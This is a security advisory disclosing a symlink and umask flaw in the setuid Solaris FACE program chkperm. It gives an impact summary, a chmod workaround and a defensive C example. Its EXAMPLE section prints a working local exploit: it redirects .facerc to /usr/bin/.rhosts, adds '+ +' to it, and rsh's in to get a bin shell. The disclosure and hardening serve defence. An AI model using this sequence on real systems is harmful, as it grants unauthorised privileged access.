-
- Solaris 2.x Vulnerability [/usr/vmsys/bin/chkperm]
-
- Problem: Vulnerabilities in /usr/vmsys/bin/chkperm
- Platform: Solaris 2.4, 2.5, 2.5.1, other System V derived
- systems with the FACE package installed
- Impact: Local users can overwrite bin owned files with
- zero length files. Local users can create world
- writable bin owned files. Account bin can be
- compromised.
- Solution: Remove the suid/sgid bit from the program until
- a patch is available
-
- ------------------------------------------------------------------------
-
- PROBLEM DESCRIPTION
-
- Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package
- called FACE (Framed Access Command Environment) installed. Included in
- the package is a program called chkperm which checks a file to see if
- the user has permission to use the FACE interface. This program is
- installed suid and sgid bin, and is trivially exploitable to
- compromise the bin account. And in Solaris, which installs many/most
- of the system binaries as bin, it may be said that "binliness is next
- to rootliness."
-
- The FACE package comes from System V, and may be available under other
- SYSV based systems. We welcome reports of other vulnerable systems.
-
- This vulnerability is believed to be known to the intruder community.
-
- ------------------------------------------------------------------------
-
- PLATFORMS AFFECTED
-
- Solaris 2.x, possibly other SYSVR4 derived systems. We welcome
- reports of other vulnerable systems.
-
- ------------------------------------------------------------------------
-
- IMPACT
-
- A local user can gain system privileges as bin (root follows shortly).
-
- ------------------------------------------------------------------------
-
- SUGGESTED WORKAROUND
-
- % chmod ug-s /usr/vmsys/bin/chkperm
-
- ------------------------------------------------------------------------
-
- EXAMPLE
-
- % mkdir /tmp/foo
- % mkdir /tmp/foo/lib
- % chmod -R 777 /tmp/foo
- % setenv VMSYS /tmp/foo
- % umask 0000
- % ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
- % /usr/vmsys/bin/chkperm -l -u foo
- % ls -l /usr/bin/.rhosts
- -rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
- % echo "+ +" >> /usr/bin/.rhosts
- % ls -l /usr/bin/.rhosts
- -rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
- % rsh -l bin localhost /bin/csh -i
- Warning: no access to tty; thus no job control in this shell...
- % id
- uid=2(bin) gid=2(bin)
-
- ------------------------------------------------------------------------
-
- DISCUSSION
-
- The program (which resides at /usr/vmsys/bin/chkperm) does several
- things in an insecure fashion:
-
- 1) It tries to open the file $VMSYS/.facerc and if the file is not
- present it creates it, with zero length, ownership bin.bin
-
- 2) The user's UMASK is inherited, so permissions on the newly-created
- .facerc are under the control of an attacker.
-
- 3) VMSYS by default is set to /usr/lib, but the program cheerfully
- checks your environment for a different VMSYS base directory, and
- uses that.
-
- 4) There is no check made for symbolic links, avoiding the need to
- race.
-
- This exploit is far from original, though it appears to be unpublished
- as yet. Blindly following symlinks, following them without checking for
- existence or matching ownership, and inheriting the user's environment
- are all examples of very naive programming wholly inappropriate for a
- program installed setuid to a system account.
-
- Sun's practice of shipping their system binaries and binaries
- directories owned and writable by bin certainly contributes to making
- this exposure more effective and dangerous.
-
- Kevin Prigge <klp@tc.umn.edu>
- John Ladwig <jladwig@soils.umn.edu>
-
-
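The four points in the DISCUSSION map onto four checks a setuid program can make before creating such a file. The C function below is an added example, not code from the advisory or from the FACE package; the name create_rc_file and the RC_BASEDIR path are assumptions chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical compiled-in base directory; it is never taken from $VMSYS. */
#define RC_BASEDIR "/usr/vmsys/lib"

/* Create `name` inside `basedir` without following symlinks, reusing an
 * existing file, or honouring the caller's umask. Returns 0 or -1. */
int create_rc_file(const char *basedir, const char *name)
{
    struct stat st;
    mode_t old_mask;
    int dfd, fd, ok;

    /* Pin the directory by descriptor; refuse a symlinked final component. */
    dfd = open(basedir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0)
        return -1;
    /* The directory must belong to root or us and not be group/world writable. */
    if (fstat(dfd, &st) != 0 || (st.st_mode & (S_IWGRP | S_IWOTH)) ||
        (st.st_uid != 0 && st.st_uid != geteuid())) {
        close(dfd);
        return -1;
    }

    old_mask = umask(077);            /* do not inherit the caller's umask */
    /* O_EXCL fails if the name already exists, even as a dangling symlink. */
    fd = openat(dfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    umask(old_mask);
    close(dfd);
    if (fd < 0)
        return -1;

    /* Verify what was actually created: regular file, one link, ours, 0600. */
    ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode) &&
         st.st_nlink == 1 && st.st_uid == geteuid() &&
         (st.st_mode & 0777) == 0600;
    close(fd);
    return ok ? 0 : -1;
}

int main(void)
{
    /* Fixed base directory: the environment is never consulted. */
    return create_rc_file(RC_BASEDIR, ".facerc") == 0 ? 0 : 1;
}
```

An existing file is treated as an error here because the function only covers the creation path; a caller that needs to read an existing rc file would open it separately with O_NOFOLLOW and apply the same fstat checks.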